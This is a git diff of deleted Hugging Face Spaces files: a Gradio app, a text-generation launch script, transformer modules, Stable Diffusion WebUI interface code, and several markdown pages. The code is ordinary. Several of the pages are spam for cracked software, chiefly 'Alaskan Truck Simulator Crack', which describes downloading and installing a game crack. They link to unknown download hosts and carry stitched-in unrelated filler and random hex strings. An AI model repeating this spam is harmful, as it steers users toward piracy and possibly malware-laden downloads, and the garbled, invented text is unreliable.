    ") - table_oneshot = gr.Dataframe(headers=["Trigger", "Action", "Trigger Description", "Action Description"], row_count=1) - - button_use_example.click(return_same, inputs=[dropdown_example], outputs=[textbox_input]) - button_use_example.click(generate_oneshot, inputs=[dropdown_example, n_beams_oneshot], outputs=[table_oneshot]) - button_generate_oneshot.click(generate_oneshot, inputs=[textbox_input, n_beams_oneshot], outputs=[table_oneshot]) - - with gr.TabItem("Functionality Discovery"): - gr.Markdown("
    Instructions for Functionality Discovery Mode
    ") - gr.Markdown(""" - 1. Describe the functionality in the `Functionality Description` text box. - 2. Click `Discover Functionalities` button. The table containing relevant trigger and action channels will show up. Each channel is accompanied by a list of available functionalities. You can scroll the table horizontally. - """) - gr.Markdown(""" NOTE: You can control how many sequences are returned by tuning the `Beam Width` slider. A larger value will cause a longer generation time.""") - - with gr.Box(): - with gr.Column(): - gr.Markdown("You can describe your own functionality directly in the `Functionality Description` text box or try a description sample from the dropdown below:") - dropdown_example = gr.Dropdown(type ="value", - choices = ["Log to my spreadsheet if motion is detected in the living room","When I am not home, let me know when any motion is detected in my house", "Turn on my Philips lamp every sunset","Update my picture in Twitter when I change my profile picture in Facebook","Save in notes when I create a new bookmark"], - label = "Select a sample functionality description") - button_use_example = gr.Button("Try this sample") - - with gr.Box(): - with gr.Column(): - textbox_input = gr.Textbox(label="Functionality Description", placeholder="Describe the functionality here") - n_beams_discover = gr.Slider(minimum=2, maximum=100, value=20, step=1, label="Beam Width") - button_discover_function = gr.Button("Discover Functions!") - - gr.Markdown("
    ") - gr.Markdown("
    Relevant Trigger Channels and Functionalities
    ") - table_discover_tc = gr.Dataframe(headers=["Trigger", "Available Functions", "Trigger Description"], row_count=1) - - gr.Markdown("
    ") - gr.Markdown("
    Relevant Action Channels and Functionalities
    ") - table_discover_ac = gr.Dataframe(headers=["Action", "Available Functions", "Action Description"], row_count=1) - - button_use_example.click(return_same, inputs=[dropdown_example], outputs=[textbox_input]) - button_use_example.click(generate_channel, inputs=[dropdown_example, n_beams_discover], outputs=[table_discover_tc, table_discover_ac]) - button_discover_function.click(generate_channel, inputs=[textbox_input, n_beams_discover], outputs=[table_discover_tc, table_discover_ac]) - -demo.launch() \ No newline at end of file diff --git a/spaces/inamXcontru/PoeticTTS/Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz La plus grande collection de livres numriques en franais.md b/spaces/inamXcontru/PoeticTTS/Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz La plus grande collection de livres numriques en franais.md deleted file mode 100644 index 25b6325647332c25b5c548f78d9e033f91ad17db..0000000000000000000000000000000000000000 --- a/spaces/inamXcontru/PoeticTTS/Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz La plus grande collection de livres numriques en franais.md +++ /dev/null @@ -1,6 +0,0 @@ -

    Bibliotheque5000LivresREPACKFRENCHEBOOKEPUBAlexandriz
    Download Zip ✵✵✵ https://gohhs.com/2uz3Iv
    -
    - aaccfb2cb3
    -
    -
    -

    diff --git a/spaces/inflaton/learn-ai/tgi.sh b/spaces/inflaton/learn-ai/tgi.sh deleted file mode 100644 index ebbc11bba5c7be51b2162af6c770840d532fcbea..0000000000000000000000000000000000000000 --- a/spaces/inflaton/learn-ai/tgi.sh +++ /dev/null @@ -1,15 +0,0 @@ -#!/bin/sh - -BASEDIR=$(dirname "$0") -cd $BASEDIR -echo Current Directory: -pwd - -uname -a - -. env/tgi.conf - -echo Running $MODEL_ID with TGI - -text-generation-launcher --model-id $MODEL_ID --port $PORT --max-input-length 2048 --max-total-tokens 4096 --ngrok --ngrok-authtoken $NGROK_AUTHTOKEN --ngrok-edge $NGROK_EDGE $QUANTIZE - diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Alaskan Truck Simulator Crack [2021].md b/spaces/inplisQlawa/anything-midjourney-v4-1/Alaskan Truck Simulator Crack [2021].md deleted file mode 100644 index 3e2cfa3e0cf0b73c88984045b8c19a239c78cd12..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Alaskan Truck Simulator Crack [2021].md +++ /dev/null @@ -1,59 +0,0 @@ -
    -

    Alaskan Truck Simulator Crack: A Unique and Challenging Game

    -

    If you are looking for a realistic and immersive simulation game that will test your driving skills and survival instincts, you should try Alaskan Truck Simulator crack. This game is a blend of the well-known simulators' classics with the ruthless environment of Alaska and elements of survival. You will have to drive a truck across the entire state, facing changing weather, snow, uneven roads, and harsh climate. You will also have to take care of your truck's condition and your own basic needs, such as hunger, fatigue, and fuel. Alaskan Truck Simulator crack is a game that will give you a proper adventure and a sense of accomplishment.

    - -

    How to Download Alaskan Truck Simulator Crack

    -

    Alaskan Truck Simulator crack is available for free download from various websites that offer cracked PC games. You can find the links to these websites by searching for "Alaskan Truck Simulator crack" on any search engine. However, you should be careful when downloading cracked games, as they may contain viruses or malware that can harm your computer. You should also use a VPN service to protect your privacy and avoid any legal issues. Alternatively, you can buy the original game from the official website or Steam and support the developers.

    -

    Alaskan Truck Simulator crack
    Download File –––––>>> https://urlin.us/2uEyPW
    - -

    How to Install Alaskan Truck Simulator Crack

    -

    Installing Alaskan Truck Simulator crack is not very difficult, but you need to follow some steps carefully. First, you need to extract the downloaded file using a program like WinRAR or 7-Zip. Then, you need to run the setup file and follow the instructions on the screen. After that, you need to copy the crack file from the folder named "CPY" or "SKIDROW" and paste it into the game's installation folder. Finally, you need to run the game as administrator and enjoy.

    - -

    How to Play Alaskan Truck Simulator Crack

    -

    Playing Alaskan Truck Simulator crack is a fun and challenging experience that will make you feel like a real truck driver in Alaska. You will have to choose your truck model, customize it, and load it with cargo. Then, you will have to drive across various locations in Alaska, such as Anchorage, Fairbanks, Juneau, Denali National Park, and more. You will have to deal with different weather conditions, such as snowstorms, blizzards, rain, fog, and wind. You will also have to avoid obstacles on the road, such as animals, rocks, trees, and other vehicles. You will have to monitor your truck's status, such as fuel level, tire pressure, engine temperature, and damage. You will also have to take care of your own needs, such as eating, sleeping, and staying warm.

    - -
    Why You Should Try Alaskan Truck Simulator Crack
    -

    Alaskan Truck Simulator crack is a game that will appeal to anyone who loves simulation games and adventure games. It is a game that will challenge your driving skills and your survival skills. It is a game that will immerse you in a realistic and beautiful environment of Alaska. It is a game that will make you feel like you are living an adventure of a lifetime. Alaskan Truck Simulator crack is a game that you should not miss.

    -
    What to Expect from Alaskan Truck Simulator Crack
    -

    Alaskan Truck Simulator crack is a game that will offer you a lot of features and content to enjoy. You will be able to experience the wildness of Alaska like never before, with stunning graphics and realistic sounds. You will be able to explore different locations and landmarks, such as Anchorage, Fairbanks, Juneau, Denali National Park, and more. You will be able to choose from various cargo types and missions, such as delivering food, fuel, lumber, or mail. You will be able to interact with other characters and events, such as wildlife encounters, road accidents, or police patrols. You will be able to customize your truck and your character, with different outfits, accessories, and skills. You will be able to play the game in different modes, such as career mode, free roam mode, or multiplayer mode.

    - -How to Enjoy Alaskan Truck Simulator Crack -

    Alaskan Truck Simulator crack is a game that will provide you with hours of fun and entertainment. However, you need to follow some tips and tricks to make the most out of it. Here are some of them:

    -
      -
    • Plan your route carefully. Alaska is a huge state with many roads and paths to choose from. You need to consider the distance, the terrain, the weather, and the traffic before you start your journey. You also need to check your map and GPS regularly to avoid getting lost or stuck.
    • -
    • Manage your resources wisely. Alaska is a harsh place with limited resources. You need to keep an eye on your fuel level, your tire pressure, your engine temperature, and your damage. You also need to take care of your own needs, such as eating, sleeping, and staying warm. You need to find places to refuel, repair, restock, or rest along the way.
    • -
    • Be prepared for anything. Alaska is a wild place with many surprises and dangers. You need to be ready for anything that can happen on the road, such as snowstorms, blizzards, rain, fog, wind, animals, rocks, trees, other vehicles, or even avalanches. You need to have the right tools and equipment for any situation, such as snow chains, winches, flares, or fire extinguishers.
    • -
    • Have fun and enjoy the scenery. Alaska is a beautiful place with many wonders and attractions. You need to take some time to appreciate the scenery and take some pictures along the way. You also need to have fun and enjoy the adventure of driving a truck across The Last Frontier.
    • -
    - -

    Alaskan Truck Simulator crack is a game that will give you an unforgettable experience of trucking in Alaska. It is a game that will challenge you and reward you at the same time. It is a game that you should try if you love simulation games and adventure games.

    -

    -When to Expect Alaskan Truck Simulator Crack -

    Alaskan Truck Simulator crack is a game that many simulation and adventure fans are eagerly waiting for. However, the game is still in development and has not yet been released. The official release date of Alaskan Truck Simulator is 7 December 2022, according to some sources. However, this date may change depending on the progress of the development and testing. The game is planned to be released on PC and consoles, such as PlayStation 4 and Xbox One. You can follow the game's official website or Steam page to get the latest updates and news about the game's release date and features.

    - -How to Get Alaskan Truck Simulator Crack for Free -

    Alaskan Truck Simulator crack is a game that will cost you some money if you want to buy the original version from the official website or Steam. However, if you want to get the game for free, you can try to download Alaskan Truck Simulator crack from various websites that offer cracked PC games. You can find these websites by searching for "Alaskan Truck Simulator crack" on any search engine. However, you should be aware of the risks and disadvantages of downloading cracked games. First of all, cracked games may contain viruses or malware that can harm your computer or steal your personal information. Second, cracked games may not work properly or have bugs and glitches that can ruin your gaming experience. Third, cracked games may not have access to online features or updates that can enhance your gameplay. Fourth, cracked games may be illegal in some countries and regions, and you may face legal consequences if you download them. Therefore, we recommend that you buy the original game from the official website or Steam and support the developers.

    -How to Try Alaskan Truck Simulator Crack for Free -

    Alaskan Truck Simulator crack is a game that you may want to try before you buy it. Fortunately, there is a way to do that without downloading any cracked files. You can try the official Alaskan Truck Simulator demo for free on Steam. The demo will let you experience a sample of the game's features and content, such as driving a truck across Alaska, dealing with weather and terrain, and managing your resources. The demo will also give you a glimpse of the game's graphics and sounds, which are designed to create a realistic and immersive environment. The demo is available for download on Steam right now, and you can play it as long as you want. However, the demo is not the full game, and it may not reflect the final quality and performance of the game. Therefore, if you want to enjoy the complete Alaskan Truck Simulator experience, you will need to buy the original game from the official website or Steam.

    - -What People Are Saying About Alaskan Truck Simulator Crack -

    Alaskan Truck Simulator crack is a game that has generated a lot of interest and excitement among simulation and adventure fans. Many people have tried the game's demo or watched its gameplay trailers and have shared their opinions and feedback on various platforms, such as Steam, YouTube, or social media. Here are some of the comments that people have made about Alaskan Truck Simulator crack:

    -
    -

    "This looks amazing! I love truck simulators and survival games, and this seems to combine both genres in a unique way. I can't wait to play this!"

    -
    -
    -

    "Wow, this game looks so realistic and beautiful. The graphics and sounds are incredible. I feel like I'm actually in Alaska."

    -
    -
    -

    "This game is so challenging and fun. The weather and terrain are unpredictable and dangerous. You have to be careful and prepared for anything. It's not just driving a truck, it's surviving in Alaska."

    -
    -
    -

    "This game is awesome! I love the customization options for the trucks and the character. I also love the open world and the landmarks. There's so much to explore and discover."

    -
    -

    As you can see, Alaskan Truck Simulator crack is a game that has received a lot of positive feedback and praise from players who have tried it or watched it. It is a game that promises to deliver a unique and immersive experience of trucking in Alaska. It is a game that you should not miss.

    -Conclusion -

    Alaskan Truck Simulator crack is a game that will let you experience the wildness of Alaska like never before. It is a game that will blend the well-known simulator classics with elements of the survival genre. It is a game that will challenge your driving skills and your survival skills. It is a game that will immerse you in a realistic and beautiful environment of Alaska. It is a game that will make you feel like you are living an adventure of a lifetime.

    -

    If you want to try Alaskan Truck Simulator crack for free, you can download the official demo from Steam and play it as long as you want. However, if you want to enjoy the full Alaskan Truck Simulator experience, you will need to buy the original game from the official website or Steam and support the developers.

    -

    Alaskan Truck Simulator crack is a game that you should not miss if you love simulation games and adventure games. It is a game that will give you an unforgettable experience of trucking in Alaska. So what are you waiting for? Add Alaskan Truck Simulator to your wishlist and get ready for the ultimate trucking adventure!

    3cee63e6c2
    -
    -
    \ No newline at end of file diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Cannot Find Script Dll X86 Rwdi.exe Dead Island Download !!TOP!!.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Cannot Find Script Dll X86 Rwdi.exe Dead Island Download !!TOP!!.md deleted file mode 100644 index 6382ea5dfa3fdb0b58015298b093a9fefbf6f15b..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Cannot Find Script Dll X86 Rwdi.exe Dead Island Download !!TOP!!.md +++ /dev/null @@ -1,12 +0,0 @@ -

    cannot find script dll x86 rwdi.exe dead island download
    DOWNLOAD https://urlin.us/2uEx1b
    -
    -# **Printing** - -When you print a document, you make a copy of it and print it. When you print a page, you print the page without any modification. There are two ways to print: by printing directly from the application or by printing directly from a document. - -**Printing from an Application** - -You can print from Microsoft Word, Microsoft Excel, Microsoft PowerPoint, and so on. Print from any application by selecting File | Print. This opens the Print dialog box. In the Print dialog box, you can select the printer and the options for printing, as shown in Figure 6-7. Figure 6-7. The Print dialog box 4fefd39f24
    -
    -
    -

    diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Cocinadelanarquistapdf [BETTER].md b/spaces/inplisQlawa/anything-midjourney-v4-1/Cocinadelanarquistapdf [BETTER].md deleted file mode 100644 index cc336d769070e5504a183976f1e08390c9b97f63..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Cocinadelanarquistapdf [BETTER].md +++ /dev/null @@ -1,6 +0,0 @@ -

    cocinadelanarquistapdf
    Download ★★★★★ https://urlin.us/2uEyiT
    -
    -Third practice of statistics - Statistics - StuviaThe Practice Of Statistics 3rd EditionAmazon.com: The Practice of Statistics: TI-83/84/89 Third ... 1fdad05405
    -
    -
    -

    diff --git a/spaces/inplisQlawa/anything-midjourney-v4-1/Come Scaricare Naufraghi Minecraft Servers.md b/spaces/inplisQlawa/anything-midjourney-v4-1/Come Scaricare Naufraghi Minecraft Servers.md deleted file mode 100644 index 91d0d2abcf798c9b92bda4a7fffb8e37dcbdb9c7..0000000000000000000000000000000000000000 --- a/spaces/inplisQlawa/anything-midjourney-v4-1/Come Scaricare Naufraghi Minecraft Servers.md +++ /dev/null @@ -1,6 +0,0 @@ -

    come scaricare naufraghi minecraft servers
    DOWNLOAD https://urlin.us/2uExQT
    - - 4d29de3e1b
    -
    -
    -

    diff --git a/spaces/iruku/and/README.md b/spaces/iruku/and/README.md deleted file mode 100644 index a3a9c4bb8237f99f875744ce78ea2b8cbc3f49b0..0000000000000000000000000000000000000000 --- a/spaces/iruku/and/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: And -emoji: 😻 -colorFrom: green -colorTo: red -sdk: docker -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/isabel/club-project/README.md b/spaces/isabel/club-project/README.md deleted file mode 100644 index bd2dd956747ba88b6c80b91c43f6599dcbec78d8..0000000000000000000000000000000000000000 --- a/spaces/isabel/club-project/README.md +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: Club Project -emoji: ⛳ -colorFrom: gray -colorTo: green -sdk: gradio -app_file: app.py -pinned: false ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/ismot/1702t1/models/modules/transformer_modules.py b/spaces/ismot/1702t1/models/modules/transformer_modules.py deleted file mode 100644 index 475d5047e8b08d51e7a91ead1bf158f004698d08..0000000000000000000000000000000000000000 --- a/spaces/ismot/1702t1/models/modules/transformer_modules.py +++ /dev/null @@ -1,250 +0,0 @@ -""" -@Date: 2021/09/01 -@description: -""" -import warnings -import math -import torch -import torch.nn.functional as F - -from torch import nn, einsum -from einops import rearrange - - -def trunc_normal_(tensor, mean=0., std=1., a=-2., b=2.): - # Cut & paste from PyTorch official master until it's in a few official releases - RW - # Method based on https://people.sc.fsu.edu/~jburkardt/presentations/truncated_normal.pdf - def norm_cdf(x): - # Computes standard normal cumulative distribution function - return (1. + math.erf(x / math.sqrt(2.))) / 2. - - if (mean < a - 2 * std) or (mean > b + 2 * std): - warnings.warn("mean is more than 2 std from [a, b] in nn.init.trunc_normal_. " - "The distribution of values may be incorrect.", - stacklevel=2) - - with torch.no_grad(): - # Values are generated by using a truncated uniform distribution and - # then using the inverse CDF for the normal distribution. - # Get upper and lower cdf values - l = norm_cdf((a - mean) / std) - u = norm_cdf((b - mean) / std) - - # Uniformly fill tensor with values from [l, u], then translate to - # [2l-1, 2u-1]. 
- tensor.uniform_(2 * l - 1, 2 * u - 1) - - # Use inverse cdf transform for normal distribution to get truncated - # standard normal - tensor.erfinv_() - - # Transform to proper mean, std - tensor.mul_(std * math.sqrt(2.)) - tensor.add_(mean) - - # Clamp to ensure it's in the proper range - tensor.clamp_(min=a, max=b) - return tensor - - -class PreNorm(nn.Module): - def __init__(self, dim, fn): - super().__init__() - self.norm = nn.LayerNorm(dim) - self.fn = fn - - def forward(self, x, **kwargs): - return self.fn(self.norm(x), **kwargs) - - -# compatibility pytorch < 1.4 -class GELU(nn.Module): - def forward(self, input): - return F.gelu(input) - - -class Attend(nn.Module): - - def __init__(self, dim=None): - super().__init__() - self.dim = dim - - def forward(self, input): - return F.softmax(input, dim=self.dim, dtype=input.dtype) - - -class FeedForward(nn.Module): - def __init__(self, dim, hidden_dim, dropout=0.): - super().__init__() - self.net = nn.Sequential( - nn.Linear(dim, hidden_dim), - GELU(), - nn.Dropout(dropout), - nn.Linear(hidden_dim, dim), - nn.Dropout(dropout) - ) - - def forward(self, x): - return self.net(x) - - -class RelativePosition(nn.Module): - def __init__(self, heads, patch_num=None, rpe=None): - super().__init__() - self.rpe = rpe - self.heads = heads - self.patch_num = patch_num - - if rpe == 'lr_parameter': - # -255 ~ 0 ~ 255 all count : patch * 2 - 1 - count = patch_num * 2 - 1 - self.rpe_table = nn.Parameter(torch.Tensor(count, heads)) - nn.init.xavier_uniform_(self.rpe_table) - elif rpe == 'lr_parameter_mirror': - # 0 ~ 127 128 ~ 1 all count : patch_num // 2 + 1 - count = patch_num // 2 + 1 - self.rpe_table = nn.Parameter(torch.Tensor(count, heads)) - nn.init.xavier_uniform_(self.rpe_table) - elif rpe == 'lr_parameter_half': - # -127 ~ 0 ~ 128 all count : patch - count = patch_num - self.rpe_table = nn.Parameter(torch.Tensor(count, heads)) - nn.init.xavier_uniform_(self.rpe_table) - elif rpe == 'fix_angle': - # 0 ~ 127 128 ~ 1 all count : patch_num // 2 + 1 - count = patch_num // 2 + 1 - # we think that closer proximity should have stronger relationships - rpe_table = (torch.arange(count, 0, -1) / count)[..., None].repeat(1, heads) - self.register_buffer('rpe_table', rpe_table) - - def get_relative_pos_embed(self): - range_vec = torch.arange(self.patch_num) - distance_mat = range_vec[None, :] - range_vec[:, None] - if self.rpe == 'lr_parameter': - # -255 ~ 0 ~ 255 -> 0 ~ 255 ~ 255 + 255 - distance_mat += self.patch_num - 1 # remove negative - return self.rpe_table[distance_mat].permute(2, 0, 1)[None] - elif self.rpe == 'lr_parameter_mirror' or self.rpe == 'fix_angle': - distance_mat[distance_mat < 0] = -distance_mat[distance_mat < 0] # mirror - distance_mat[distance_mat > self.patch_num // 2] = self.patch_num - distance_mat[ - distance_mat > self.patch_num // 2] # remove repeat - return self.rpe_table[distance_mat].permute(2, 0, 1)[None] - elif self.rpe == 'lr_parameter_half': - distance_mat[distance_mat > self.patch_num // 2] = distance_mat[ - distance_mat > self.patch_num // 2] - self.patch_num # remove repeat > 128 exp: 129 -> -127 - distance_mat[distance_mat < -self.patch_num // 2 + 1] = distance_mat[ - distance_mat < -self.patch_num // 2 + 1] + self.patch_num # remove repeat < -127 exp: -128 -> 128 - # -127 ~ 0 ~ 128 -> 0 ~ 0 ~ 127 + 127 + 128 - distance_mat += self.patch_num//2 - 1 # remove negative - return self.rpe_table[distance_mat].permute(2, 0, 1)[None] - - def forward(self, attn): - return attn + self.get_relative_pos_embed() - - -class 
Attention(nn.Module): - def __init__(self, dim, heads=8, dim_head=64, dropout=0., patch_num=None, rpe=None, rpe_pos=1): - """ - :param dim: - :param heads: - :param dim_head: - :param dropout: - :param patch_num: - :param rpe: relative position embedding - """ - super().__init__() - - self.relative_pos_embed = None if patch_num is None or rpe is None else RelativePosition(heads, patch_num, rpe) - inner_dim = dim_head * heads - project_out = not (heads == 1 and dim_head == dim) - - self.heads = heads - self.scale = dim_head ** -0.5 - self.rpe_pos = rpe_pos - - self.attend = Attend(dim=-1) - self.to_qkv = nn.Linear(dim, inner_dim * 3, bias=False) - - self.to_out = nn.Sequential( - nn.Linear(inner_dim, dim), - nn.Dropout(dropout) - ) if project_out else nn.Identity() - - def forward(self, x): - b, n, _, h = *x.shape, self.heads - qkv = self.to_qkv(x).chunk(3, dim=-1) - q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h=h), qkv) - - dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale - - if self.rpe_pos == 0: - if self.relative_pos_embed is not None: - dots = self.relative_pos_embed(dots) - - attn = self.attend(dots) - - if self.rpe_pos == 1: - if self.relative_pos_embed is not None: - attn = self.relative_pos_embed(attn) - - out = einsum('b h i j, b h j d -> b h i d', attn, v) - out = rearrange(out, 'b h n d -> b n (h d)') - return self.to_out(out) - - -class AbsolutePosition(nn.Module): - def __init__(self, dim, dropout=0., patch_num=None, ape=None): - super().__init__() - self.ape = ape - - if ape == 'lr_parameter': - self.absolute_pos_embed = nn.Parameter(torch.zeros(1, patch_num, dim)) - trunc_normal_(self.absolute_pos_embed, std=.02) - - elif ape == 'fix_angle': - angle = torch.arange(0, patch_num, dtype=torch.float) / patch_num * (math.pi * 2) - self.absolute_pos_embed = torch.sin(angle)[..., None].repeat(1, dim)[None] - - def forward(self, x): - return x + self.absolute_pos_embed - - -class WinAttention(nn.Module): - def __init__(self, dim, win_size=8, shift=0, heads=8, dim_head=64, dropout=0., rpe=None, rpe_pos=1): - super().__init__() - - self.win_size = win_size - self.shift = shift - self.attend = Attention(dim, heads=heads, dim_head=dim_head, - dropout=dropout, patch_num=win_size, rpe=None if rpe is None else 'lr_parameter', - rpe_pos=rpe_pos) - - def forward(self, x): - b = x.shape[0] - if self.shift != 0: - x = torch.roll(x, shifts=self.shift, dims=-2) - x = rearrange(x, 'b (m w) d -> (b m) w d', w=self.win_size) # split windows - - out = self.attend(x) - - out = rearrange(out, '(b m) w d -> b (m w) d ', b=b) # recover windows - if self.shift != 0: - out = torch.roll(out, shifts=-self.shift, dims=-2) - - return out - - -class Conv(nn.Module): - def __init__(self, dim, dropout=0.): - super().__init__() - self.dim = dim - self.net = nn.Sequential( - nn.Conv1d(dim, dim, kernel_size=3, stride=1, padding=0), - nn.Dropout(dropout) - ) - - def forward(self, x): - x = x.transpose(1, 2) - x = torch.cat([x[..., -1:], x, x[..., :1]], dim=-1) - x = self.net(x) - return x.transpose(1, 2) diff --git a/spaces/jackli888/stable-diffusion-webui/modules/ui_common.py b/spaces/jackli888/stable-diffusion-webui/modules/ui_common.py deleted file mode 100644 index 21ebb0955eec9604d6d41c22eeb1541f70a82580..0000000000000000000000000000000000000000 --- a/spaces/jackli888/stable-diffusion-webui/modules/ui_common.py +++ /dev/null @@ -1,206 +0,0 @@ -import json -import html -import os -import platform -import sys - -import gradio as gr -import subprocess as sp - -from modules import 
call_queue, shared -from modules.generation_parameters_copypaste import image_from_url_text -import modules.images - -folder_symbol = '\U0001f4c2' # 📂 - - -def update_generation_info(generation_info, html_info, img_index): - try: - generation_info = json.loads(generation_info) - if img_index < 0 or img_index >= len(generation_info["infotexts"]): - return html_info, gr.update() - return plaintext_to_html(generation_info["infotexts"][img_index]), gr.update() - except Exception: - pass - # if the json parse or anything else fails, just return the old html_info - return html_info, gr.update() - - -def plaintext_to_html(text): - text = "

    " + "
    \n".join([f"{html.escape(x)}" for x in text.split('\n')]) + "

    " - return text - - -def save_files(js_data, images, do_make_zip, index): - import csv - filenames = [] - fullfns = [] - - #quick dictionary to class object conversion. Its necessary due apply_filename_pattern requiring it - class MyObject: - def __init__(self, d=None): - if d is not None: - for key, value in d.items(): - setattr(self, key, value) - - data = json.loads(js_data) - - p = MyObject(data) - path = shared.opts.outdir_save - save_to_dirs = shared.opts.use_save_to_dirs_for_ui - extension: str = shared.opts.samples_format - start_index = 0 - - if index > -1 and shared.opts.save_selected_only and (index >= data["index_of_first_image"]): # ensures we are looking at a specific non-grid picture, and we have save_selected_only - - images = [images[index]] - start_index = index - - os.makedirs(shared.opts.outdir_save, exist_ok=True) - - with open(os.path.join(shared.opts.outdir_save, "log.csv"), "a", encoding="utf8", newline='') as file: - at_start = file.tell() == 0 - writer = csv.writer(file) - if at_start: - writer.writerow(["prompt", "seed", "width", "height", "sampler", "cfgs", "steps", "filename", "negative_prompt"]) - - for image_index, filedata in enumerate(images, start_index): - image = image_from_url_text(filedata) - - is_grid = image_index < p.index_of_first_image - i = 0 if is_grid else (image_index - p.index_of_first_image) - - fullfn, txt_fullfn = modules.images.save_image(image, path, "", seed=p.all_seeds[i], prompt=p.all_prompts[i], extension=extension, info=p.infotexts[image_index], grid=is_grid, p=p, save_to_dirs=save_to_dirs) - - filename = os.path.relpath(fullfn, path) - filenames.append(filename) - fullfns.append(fullfn) - if txt_fullfn: - filenames.append(os.path.basename(txt_fullfn)) - fullfns.append(txt_fullfn) - - writer.writerow([data["prompt"], data["seed"], data["width"], data["height"], data["sampler_name"], data["cfg_scale"], data["steps"], filenames[0], data["negative_prompt"]]) - - # Make Zip - if do_make_zip: - zip_filepath = os.path.join(path, "images.zip") - - from zipfile import ZipFile - with ZipFile(zip_filepath, "w") as zip_file: - for i in range(len(fullfns)): - with open(fullfns[i], mode="rb") as f: - zip_file.writestr(filenames[i], f.read()) - fullfns.insert(0, zip_filepath) - - return gr.File.update(value=fullfns, visible=True), plaintext_to_html(f"Saved: {filenames[0]}") - - -def create_output_panel(tabname, outdir): - from modules import shared - import modules.generation_parameters_copypaste as parameters_copypaste - - def open_folder(f): - if not os.path.exists(f): - print(f'Folder "{f}" does not exist. After you create an image, the folder will be created.') - return - elif not os.path.isdir(f): - print(f""" -WARNING -An open_folder request was made with an argument that is not a folder. -This could be an error or a malicious attempt to run code on your computer. 
-Requested path was: {f} -""", file=sys.stderr) - return - - if not shared.cmd_opts.hide_ui_dir_config: - path = os.path.normpath(f) - if platform.system() == "Windows": - os.startfile(path) - elif platform.system() == "Darwin": - sp.Popen(["open", path]) - elif "microsoft-standard-WSL2" in platform.uname().release: - sp.Popen(["wsl-open", path]) - else: - sp.Popen(["xdg-open", path]) - - with gr.Column(variant='panel', elem_id=f"{tabname}_results"): - with gr.Group(elem_id=f"{tabname}_gallery_container"): - result_gallery = gr.Gallery(label='Output', show_label=False, elem_id=f"{tabname}_gallery").style(grid=4) - - generation_info = None - with gr.Column(): - with gr.Row(elem_id=f"image_buttons_{tabname}"): - open_folder_button = gr.Button(folder_symbol, elem_id="hidden_element" if shared.cmd_opts.hide_ui_dir_config else f'open_folder_{tabname}') - - if tabname != "extras": - save = gr.Button('Save', elem_id=f'save_{tabname}') - save_zip = gr.Button('Zip', elem_id=f'save_zip_{tabname}') - - buttons = parameters_copypaste.create_buttons(["img2img", "inpaint", "extras"]) - - open_folder_button.click( - fn=lambda: open_folder(shared.opts.outdir_samples or outdir), - inputs=[], - outputs=[], - ) - - if tabname != "extras": - with gr.Row(): - download_files = gr.File(None, file_count="multiple", interactive=False, show_label=False, visible=False, elem_id=f'download_files_{tabname}') - - with gr.Group(): - html_info = gr.HTML(elem_id=f'html_info_{tabname}') - html_log = gr.HTML(elem_id=f'html_log_{tabname}') - - generation_info = gr.Textbox(visible=False, elem_id=f'generation_info_{tabname}') - if tabname == 'txt2img' or tabname == 'img2img': - generation_info_button = gr.Button(visible=False, elem_id=f"{tabname}_generation_info_button") - generation_info_button.click( - fn=update_generation_info, - _js="function(x, y, z){ return [x, y, selected_gallery_index()] }", - inputs=[generation_info, html_info, html_info], - outputs=[html_info, html_info], - ) - - save.click( - fn=call_queue.wrap_gradio_call(save_files), - _js="(x, y, z, w) => [x, y, false, selected_gallery_index()]", - inputs=[ - generation_info, - result_gallery, - html_info, - html_info, - ], - outputs=[ - download_files, - html_log, - ], - show_progress=False, - ) - - save_zip.click( - fn=call_queue.wrap_gradio_call(save_files), - _js="(x, y, z, w) => [x, y, true, selected_gallery_index()]", - inputs=[ - generation_info, - result_gallery, - html_info, - html_info, - ], - outputs=[ - download_files, - html_log, - ] - ) - - else: - html_info_x = gr.HTML(elem_id=f'html_info_x_{tabname}') - html_info = gr.HTML(elem_id=f'html_info_{tabname}') - html_log = gr.HTML(elem_id=f'html_log_{tabname}') - - for paste_tabname, paste_button in buttons.items(): - parameters_copypaste.register_paste_params_button(parameters_copypaste.ParamBinding( - paste_button=paste_button, tabname=paste_tabname, source_tabname="txt2img" if tabname == "txt2img" else None, source_image_component=result_gallery - )) - - return result_gallery, generation_info if tabname != "extras" else html_info_x, html_info, html_log diff --git a/spaces/james-oldfield/PandA/networks/stylegan3/metrics/metric_utils.py b/spaces/james-oldfield/PandA/networks/stylegan3/metrics/metric_utils.py deleted file mode 100644 index af122b21b5a7874d63b79ee40c2cb36d4ab4e5a2..0000000000000000000000000000000000000000 --- a/spaces/james-oldfield/PandA/networks/stylegan3/metrics/metric_utils.py +++ /dev/null @@ -1,279 +0,0 @@ -# Copyright (c) 2021, NVIDIA CORPORATION & AFFILIATES. All rights reserved. 
